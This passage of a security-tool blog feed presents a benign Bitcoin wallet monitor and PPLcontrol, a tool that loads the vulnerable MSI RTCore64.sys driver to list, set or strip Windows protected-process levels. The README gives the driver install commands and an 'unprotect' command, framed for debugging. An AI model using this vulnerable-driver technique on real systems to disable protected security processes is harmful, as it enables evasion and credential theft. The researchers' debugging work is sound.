dir="auto">dtmsecurity - Beacon Object File (BOF) Creation Helper<br /> <a href="https://github.com/dtmsecurity/bof_helper" rel="nofollow" target="_blank" title="https://github.com/dtmsecurity/bof_helper">https://github.com/dtmsecurity/bof_helper</a></p> <p dir="auto">Microsoft :) <br /> <a href="https://learn.microsoft.com/en-us/windows/win32/api/" rel="nofollow" target="_blank" title="https://learn.microsoft.com/en-us/windows/win32/api/">https://learn.microsoft.com/en-us/windows/win32/api/</a></p> <p dir="auto">HsTechDocs by HelpSystems(Fortra)<br /> <a href="https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_how-to-develop.htm" rel="nofollow" target="_blank" title="https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_how-to-develop.htm">https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_how-to-develop.htm</a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/mertdas/PrivKit" rel="nofollow" target="_blank" title="Download PrivKit">Download PrivKit</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-24979458926513576462023-07-25T09:14:00.002-04:002023-07-25T09:14:35.317-04:00Wallet-Transaction-Monitor - This Script Monitors A Bitcoin Wallet Address And Notifies The User When There Are Changes In The Balance Or New Transactions<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhuDeLU636d0AjcBrP67ciRyE7X4uNUHsXUhuPHyuNxn-5S1sjYT5n5bp2IRlL-FJMNsINf5XWHpKlcTDBb_tVnLk6Vs354WrDWwz6ufwM0_XSMOGD5vVOMdR1yaU33XijgswR-QWlY8LwA2nXrrZmDotvQGJmfdRg4rGdlLmPYkGfDhhQYrYMTEszR6Wlj"><img alt="" border="0" height="356" id="BLOGGER_PHOTO_ID_7257368381575957922" src="https://blogger.googleusercontent.com/img/a/AVvXsEhuDeLU636d0AjcBrP67ciRyE7X4uNUHsXUhuPHyuNxn-5S1sjYT5n5bp2IRlL-FJMNsINf5XWHpKlcTDBb_tVnLk6Vs354WrDWwz6ufwM0_XSMOGD5vVOMdR1yaU33XijgswR-QWlY8LwA2nXrrZmDotvQGJmfdRg4rGdlLmPYkGfDhhQYrYMTEszR6Wlj=w640-h356" width="640" /></a></p><br /> <p dir="auto">This script monitors a <a href="https://www.kitploit.com/search/label/Bitcoin" target="_blank" title="Bitcoin">Bitcoin</a> wallet address and notifies the user when there are changes in the balance or new transactions. It provides <a href="https://www.kitploit.com/search/label/Real-Time" target="_blank" title="real-time">real-time</a> updates on incoming and outgoing transactions, along with the corresponding amounts and timestamps. Additionally, it can play a sound notification on <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> when a new transaction occurs.<span></span></p><a name='more'></a><p></p><blockquote><ul dir="auto"> </ul> </blockquote> <h3 dir="auto" tabindex="-1">Requirements</h3> <p dir="auto">Python 3.x requests library: You can install it by running pip install requests. winsound module: This module is available by default on Windows.</p> <h3 dir="auto" tabindex="-1">How to Run</h3> <ul dir="auto"> <li>Make sure you have Python 3.x installed on your system.</li> <li>pip install -r requirements.txt</li> <li>Clone or download the script file wallet_transaction_monitor.py from this repository.</li> <li>Place the sound file (in .wav format) you want to use for the notification in the same <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> as the script. Make sure to replace "soundfile.wav" in the script with the actual filename of your sound file.</li> <li>Open a terminal or command prompt and navigate to the directory where the script is located.</li> </ul> <ul dir="auto"> <li>Run the script by executing the following command:</li> </ul> <div><pre><code>python wallet_transaction_monitor.py</code></pre></div> <p dir="auto">The script will start monitoring the wallet and display updates whenever there are changes in the balance or new transactions. It will also play the specified sound notification on Windows.</p> <h3 dir="auto" tabindex="-1">Important Notes</h3> <p dir="auto">This script is designed to work on Windows due to the use of the winsound module for sound notifications. If you are using a different operating system, you may need to modify the sound-related code or use an alternative method for <a href="https://www.kitploit.com/search/label/Audio" target="_blank" title="audio">audio</a> notifications. The script uses the Blockchain.info API to fetch wallet data. Please ensure you have a stable internet connection for the script to work correctly. It's recommended to run the script in the background or keep the terminal window open while monitoring the wallet.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/SomethingTotallyRandom/Wallet-Transaction-Monitor" rel="nofollow" target="_blank" title="Download Wallet-Transaction-Monitor">Download Wallet-Transaction-Monitor</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-60927706730164832742023-07-16T08:30:00.003-04:002023-07-16T08:30:00.134-04:00PPLcontrol - Controlling Windows PP(L)s<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCVW_aQlUOUcJ-1hu-Lfmu37YQkP155xR1Ss1FG1cTgwtdJWkqYypXoK-FkNadmmmLxwp83-fyakvI7nOluK-G5gPLUZjUywtcH2NMFA4XKLbzYBZk04C7aZM-aqJfnhkooYR1_pbm35auMGYDfDsvV82Ewov86uYC3V7sfiE_Y9GxpdS7U8SJrExiixtM/s490/h36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="320" data-original-width="490" height="418" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCVW_aQlUOUcJ-1hu-Lfmu37YQkP155xR1Ss1FG1cTgwtdJWkqYypXoK-FkNadmmmLxwp83-fyakvI7nOluK-G5gPLUZjUywtcH2NMFA4XKLbzYBZk04C7aZM-aqJfnhkooYR1_pbm35auMGYDfDsvV82Ewov86uYC3V7sfiE_Y9GxpdS7U8SJrExiixtM/w640-h418/h36.png" width="640" /></a></div><p><br /></p> <p dir="auto">This tool allows you to list protected processes, get the protection level of a specific process, or set an arbitrary protection level. For more information, you can read this blog post: <a href="https://itm4n.github.io/debugging-protected-processes/" rel="nofollow" target="_blank" title="Debugging Protected Processes">Debugging Protected Processes</a>.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Usage</h2> <h3 dir="auto" tabindex="-1">1. Download the MSI driver</h3> <p dir="auto">You can get a copy of the MSI driver <code>RTCore64.sys</code> here: <a href="https://github.com/RedCursorSecurityConsulting/PPLKiller/tree/master/driver" rel="nofollow" target="_blank" title="PPLKiller/driver">PPLKiller/driver</a>.</p> <h3 dir="auto" tabindex="-1">2. Install the MSI driver</h3> <p dir="auto"><strong>Disclaimer:</strong> it goes without saying that you should never install this driver on your host machine. <strong>Use a VM!</strong></p> <div class="highlight highlight-source-batchfile notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="sc.exe create RTCore64 type= <a title="Kernel" href="https://www.kitploit.com/search/label/Kernel">kernel</a> start= auto binPath= C:\PATH\TO\RTCore64.sys DisplayName= "Micro - Star MSI Afterburner" net start RTCore64" dir="auto"><pre><code>sc.exe create RTCore64 type= kernel start= auto binPath= C:\PATH\TO\RTCore64.sys DisplayName= "Micro - Star MSI Afterburner"<br />net start RTCore64</code></pre></div> <h3 dir="auto" tabindex="-1">3. Use PPLcontrol</h3> <p dir="auto">List protected processes.</p> <div><pre><code>PPLcontrol.exe list</code></pre></div> <p dir="auto">Get the protection level of a specific process.</p> <div><pre><code>PPLcontrol.exe get 1234</code></pre></div> <p dir="auto">Set an arbitrary protection level.</p> <div><pre><code>PPLcontrol.exe set 1234 PPL WinTcb</code></pre></div> <p dir="auto">Protect a non-protected process with an arbitrary protection level. This will also automatically adjust the signature levels accordingly.</p> <div><pre><code>PPLcontrol.exe protect 1234 PPL WinTcb</code></pre></div> <p dir="auto">Unprotect a protected process. This will set the protection level to <code>0</code> (<em>i.e.</em> <code>None</code>) and the EXE/DLL signature levels to <code>0</code> (<em>i.e.</em> <code>Unchecked</code>).</p> <div><pre><code>PPLcontrol.exe unprotect 1234</code></pre></div> <h3 dir="auto" tabindex="-1">4. Uninstall the driver</h3> <div class="highlight highlight-source-batchfile notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="net stop RTCore64 sc.exe delete RTCore64" dir="auto"><pre><code>net stop RTCore64<br />sc.exe delete RTCore64</code></pre></div> <h2 dir="auto" tabindex="-1">Use cases</h2> <h3 dir="auto" tabindex="-1">Debugging a protected process with WinDbg</h3> <p dir="auto">WinDbg just needs to open the target process, so you can use PPLcontrol to set an arbitrary protection level on your <code>windbg.exe</code> process.</p> <ol dir="auto"> <li>Get the PID of the <code>windbg.exe</code> process.</li> <li>Use PPLcontrol to set an arbitrary protection level.</li> </ol> <div class="highlight highlight-text-shell-session notranslate position-relative overflow-auto" console="" data-snippet-clipboard-copy-content="C:\Temp>tasklist | findstr /i windbg windbg.exe 1232 <a title=" href="https://www.kitploit.com/search/label/Console">Console 1 24,840 K C:\Temp>PPLcontrol.exe protect 1232 PPL WinTcb [+] The <a href="https://www.kitploit.com/search/label/Protection" target="_blank" title="Protection">Protection</a> 'PPL-WinTcb' was set on the process with PID 1232, previous protection was: 'None-None'. [+] The Signature level 'WindowsTcb' and the Section signature level 'Windows' were set on the process with PID 1232." dir="auto"><pre><code>C:\Temp>tasklist | findstr /i windbg<br />windbg.exe 1232 Console 1 24,840 K<br />C:\Temp>PPLcontrol.exe protect 1232 PPL WinTcb<br />[+] The Protection 'PPL-WinTcb' was set on the process with PID 1232, previous protection was: 'None-None'.<br />[+] The Signature level 'WindowsTcb' and the Section signature level 'Windows' were set on the process with PID 1232.</code></pre></div> <h3 dir="auto" tabindex="-1">Inspecting a protected process with API Monitor</h3> <p dir="auto">In addition to opening the target process, API monitor injects a DLL into it. Therefore, setting an arbitrary protection level on your <code>apimonitor.exe</code> process won't suffice. Since the injected DLL is not properly signed for this purpose, the Section signature flag of the target process will likely prevent it from being loaded. However, you can temporarily disable the protection on the target process, start monitoring it, and restore the protection right after.</p> <div><pre><code>Failed to load module in target process - Error: 577, <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> cannot verify the digital signature for this file. A recent <a href="https://www.kitploit.com/search/label/Hardware" target="_blank" title="hardware">hardware</a> or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.</code></pre></div> <ol dir="auto"> <li>Get the PID of the target process.</li> <li>Use PPLcontrol to get the protection level of the target process.</li> <li>Unprotect the process.</li> <li>Start monitoring the process with API Monitor.</li> <li>Restore the protection of the target process.</li> </ol> <div class="highlight highlight-text-shell-session notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="C:\Temp>tasklist | findstr /i target target.exe 1337 Services 1 14,160 K C:\Temp>PPLcontrol.exe get 1337 [+] The process with PID 1337 is a PPL with the Signer type 'WinTcb' (6). C:\Temp>PPLcontrol.exe unprotect 1337 [+] The process with PID 1337 is no longer a PP(L). C:\Temp>PPLcontrol.exe protect 1337 PPL WinTcb [+] The Protection 'PPL-WinTcb' was set on the process with PID 1337, previous protection was: 'None-None'. [+] The Signature level 'WindowsTcb' and the Section signature level 'Windows' were set on the process with PID 1337." dir="auto"><pre><code>C:\Temp>tasklist | findstr /i target<br />target.exe 1337 Services 1 14,160 K<br />C:\Temp>PPLcontrol.exe get 1337<br />[+] The process with PID 1337 is a PPL with the Signer type 'WinTcb' (6).<br />C:\Temp>PPLcontrol.exe unprotect 1337<br />[+] The process with PID 1337 is no longer a PP(L).<br /><br />C:\Temp>PPLcontrol.exe protect 1337 PPL WinTcb<br />[+] The Protection 'PPL-WinTcb' was set on the process with PID 1337, previous protection was: 'None-None'.<br />[+] The Signature level 'WindowsTcb' and the Section signature level 'Windows' were set on the process with PID 1337.</code></pre></div> <h2 dir="auto" tabindex="-1">Build</h2> <ol dir="auto"> <li>Open the solution in Visual Studio.</li> <li>Select <code>Release/x64</code> (<code>x86</code> is not supported and will probably never be).</li> <li>Build solution</li> </ol> <h2 dir="auto" tabindex="-1">Credit</h2> <ul dir="auto"> <li><a href="https://twitter.com/aceb0nd" rel="nofollow" target="_blank" title="@aceb0nd">@aceb0nd</a> for the tool <a href="https://github.com/RedCursorSecurityConsulting/PPLKiller" rel="nofollow" target="_blank" title="PPLKiller">PPLKiller</a></li> <li><a href="https://twitter.com/aionescu" rel="nofollow" target="_blank" title="@aionescu">@aionescu</a> for the article <a href="https://www.alex-ionescu.com/?p=146" rel="nofollow" target="_blank" title="Protected Processes Part 3: Windows PKI Internals (Signing Levels, Scenarios, Root Keys, EKUs & Runtime Signers)">Protected Processes Part 3: Windows PKI Internals (Signing Levels, Scenarios, Root Keys, EKUs & Runtime Signers)</a></li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/itm4n/PPLcontrol" rel="nofollow" target="_blank" title="Download PPLcontrol">Download PPLcontrol</a></span></b></div>Unknownnoreply@blogger.com